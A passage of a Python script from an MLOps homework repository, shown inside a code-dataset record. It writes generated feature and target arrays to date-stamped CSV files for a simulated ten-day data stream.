Path(save_data_path[:save_data_path.rfind('/')]).mkdir(parents=True, exist_ok=True)\n np.savetxt(save_data_path, X[idx].astype(int), fmt=\"%i\", delimiter=\",\")\n \n\n if save_target_path is not None:\n save_target_path = save_target_path.format(date)\n Path(save_target_path[:save_target_path.rfind('/')]).mkdir(parents=True, exist_ok=True)\n np.savetxt(save_target_path, y[idx].astype(int), fmt=\"%i\", delimiter=\",\")\n\nif __name__ == \"__main__\": \n num_days = 10\n start_date = datetime.today() - timedelta(days = num_days)\n\n for i in range(num_days):\n cur_date = datetime.today() + timedelta(days = i)\n\n _generate_data(\n batch_size,\n raw_data_path,\n raw_target_path,\n cur_date.strftime('%Y-%m-%d')\n )\n","repo_name":"made-mlops-2022/pudyakov_yaroslav_made","sub_path":"hw3/scripts/generate_data_stream.py","file_name":"generate_data_stream.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}